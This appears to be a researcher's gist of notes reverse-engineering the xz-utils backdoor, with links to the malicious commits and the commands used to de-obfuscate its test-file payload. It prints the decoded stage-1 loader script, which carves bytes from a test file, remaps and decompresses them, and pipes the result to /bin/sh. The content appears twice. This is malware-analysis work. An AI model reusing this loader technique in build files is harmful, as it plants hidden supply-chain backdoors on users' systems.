Akanoa/gist:2dc95d505790456f2c5efc9def109cbc

## gistfile1.txt
// patch security note by JiaT75 itself
https://salsa.debian.org/debian/xz-utils/-/blame/b43c3e48bf6097095eef36d44cdbec811074940a/.github/SECURITY.md#L12
// patch m4 file on sid debian
https://salsa.debian.org/debian/xz-utils/-/blame/2024dccf07e81337871814ff6f877a233657e5e4/m4/build-to-host.m4#L63
// backport 5.6.0
https://salsa.debian.org/debian/xz-utils/-/commit/12388833e66a4ddafe08571882ad638a511cf68b?page=10#71e626f2c3f59e8b311f7777379f651145fda3d3
// read payload stage 0 -> stage 1
https://salsa.debian.org/debian/xz-utils/-/blame/2024dccf07e81337871814ff6f877a233657e5e4/m4/build-to-host.m4#L95
// build to host patch
https://www.diffchecker.com/DxS4Wz01/
// xz bot
https://github.com/amlweems/xzbot
// target only x86_64 arch
https://gist.github.com/Akanoa/ef9922f0ba0aa13038f8a4b33075617d#file-xz-injected-file-L29
// target only GNU linker
https://gist.github.com/Akanoa/ef9922f0ba0aa13038f8a4b33075617d#file-xz-injected-file-L51
// reverse double obfuscated payload
https://gynvael.coldwind.pl/?lang=en&id=782
// payloads
https://git.tukaani.org/?p=xz.git;a=commit;h=6e636819e8f070330d835fce46289a3ff72a7b89

// xz-scripts
https://research.swtch.com/xz-script

// file rename (delay the attack?9)
https://git.tukaani.org/?p=xz.git;a=commit;h=419f55f9dfc2df8792902b8953d50690121afeea

// reverse
// remap symbols
cat tests_files_bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" > bad-3-corrupt_lzma2_remap.xz
// diff binary

❯ diff <(xxd tests_files_bad-3-corrupt_lzma2.xz) <(xxd bad-3-corrupt_lzma2_remap.xz)
7,8c7,8
< 00000060: e005 1601 5f5d 0005 20a5 2d55 bb98 047c  ...._].. .-U...|
< 00000070: c699 bca0 664d cd31 ad0b 2920 b828 0c2e  ....fM.1..) .(..
---
> 00000060: e005 1601 2d5d 0005 09a5 5f55 bb98 047c  ....-]...._U...|
> 00000070: c699 bca0 664d cd31 ad0b 2909 b828 0c2e  ....fM.1..)..(..
12c12
< 000000b0: ea49 9e60 3fc4 c6f5 a6fd 965b af61 7f2d  .I.`?......[.a.-
---
> 000000b0: ea49 9e60 3fc4 c6f5 a6fd 965b af61 7f5f  .I.`?......[.a._
18,19c18,19
< 00000110: 6e91 7f29 b86c 0b58 cd77 2c28 09ac 2a24  n..).l.X.w,(..*$
< 00000120: 1320 1921 7c03 4a30 b202 1898 d120 2034  . .!|.J0.....  4
---
> 00000110: 6e91 7f29 b86c 0b58 cd77 2c28 20ac 2a24  n..).l.X.w,( .*$
> 00000120: 1309 1921 7c03 4a30 b202 1898 d109 0934  ...!|.J0.......4

// real stage 1
cat tests_files_bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d

####Hello####
#�U��$�
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
// discard 1ko, takes 2ko, discard 1ko, ... , takes 939 o
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh
####World####

// get the stage 2 payload
./take_relevant-step3.sh
xz -F raw --lzma1 -dc good-large_uncompressed_remap.bi
	// patch security note by JiaT75 itself
	https://salsa.debian.org/debian/xz-utils/-/blame/b43c3e48bf6097095eef36d44cdbec811074940a/.github/SECURITY.md#L12
	// patch m4 file on sid debian
	https://salsa.debian.org/debian/xz-utils/-/blame/2024dccf07e81337871814ff6f877a233657e5e4/m4/build-to-host.m4#L63
	// backport 5.6.0
	https://salsa.debian.org/debian/xz-utils/-/commit/12388833e66a4ddafe08571882ad638a511cf68b?page=10#71e626f2c3f59e8b311f7777379f651145fda3d3
	// read payload stage 0 -> stage 1
	https://salsa.debian.org/debian/xz-utils/-/blame/2024dccf07e81337871814ff6f877a233657e5e4/m4/build-to-host.m4#L95
	// build to host patch
	https://www.diffchecker.com/DxS4Wz01/
	// xz bot
	https://github.com/amlweems/xzbot
	// target only x86_64 arch
	https://gist.github.com/Akanoa/ef9922f0ba0aa13038f8a4b33075617d#file-xz-injected-file-L29
	// target only GNU linker
	https://gist.github.com/Akanoa/ef9922f0ba0aa13038f8a4b33075617d#file-xz-injected-file-L51
	// reverse double obfuscated payload
	https://gynvael.coldwind.pl/?lang=en&id=782
	// payloads
	https://git.tukaani.org/?p=xz.git;a=commit;h=6e636819e8f070330d835fce46289a3ff72a7b89

	// xz-scripts
	https://research.swtch.com/xz-script

	// file rename (delay the attack?9)
	https://git.tukaani.org/?p=xz.git;a=commit;h=419f55f9dfc2df8792902b8953d50690121afeea

	// reverse
	// remap symbols
	cat tests_files_bad-3-corrupt_lzma2.xz \| tr "\t \-_" " \t_\-" > bad-3-corrupt_lzma2_remap.xz
	// diff binary

	❯ diff <(xxd tests_files_bad-3-corrupt_lzma2.xz) <(xxd bad-3-corrupt_lzma2_remap.xz)
	7,8c7,8
	< 00000060: e005 1601 5f5d 0005 20a5 2d55 bb98 047c ...._].. .-U...\|
	< 00000070: c699 bca0 664d cd31 ad0b 2920 b828 0c2e ....fM.1..) .(..
	---
	> 00000060: e005 1601 2d5d 0005 09a5 5f55 bb98 047c ....-]...._U...\|
	> 00000070: c699 bca0 664d cd31 ad0b 2909 b828 0c2e ....fM.1..)..(..
	12c12
	< 000000b0: ea49 9e60 3fc4 c6f5 a6fd 965b af61 7f2d .I.`?......[.a.-
	---
	> 000000b0: ea49 9e60 3fc4 c6f5 a6fd 965b af61 7f5f .I.`?......[.a._
	18,19c18,19
	< 00000110: 6e91 7f29 b86c 0b58 cd77 2c28 09ac 2a24 n..).l.X.w,(..*$
	< 00000120: 1320 1921 7c03 4a30 b202 1898 d120 2034 . .!\|.J0..... 4
	---
	> 00000110: 6e91 7f29 b86c 0b58 cd77 2c28 20ac 2a24 n..).l.X.w,( .*$
	> 00000120: 1309 1921 7c03 4a30 b202 1898 d109 0934 ...!\|.J0.......4

	// real stage 1
	cat tests_files_bad-3-corrupt_lzma2.xz \| tr "\t \-_" " \t_\-" \| xz -d

	####Hello####
	#�U��$�
	[ ! $(uname) = "Linux" ] && exit 0
	[ ! $(uname) = "Linux" ] && exit 0
	[ ! $(uname) = "Linux" ] && exit 0
	[ ! $(uname) = "Linux" ] && exit 0
	[ ! $(uname) = "Linux" ] && exit 0
	eval `grep ^srcdir= config.status`
	if test -f ../../config.status;then
	eval `grep ^srcdir= ../../config.status`
	srcdir="../../$srcdir"
	fi
	// discard 1ko, takes 2ko, discard 1ko, ... , takes 939 o
	export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma\|eval $i\|tail -c +31233\|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")\|xz -F raw --lzma1 -dc\|/bin/sh
	####World####

	// get the stage 2 payload
	./take_relevant-step3.sh
	xz -F raw --lzma1 -dc good-large_uncompressed_remap.bi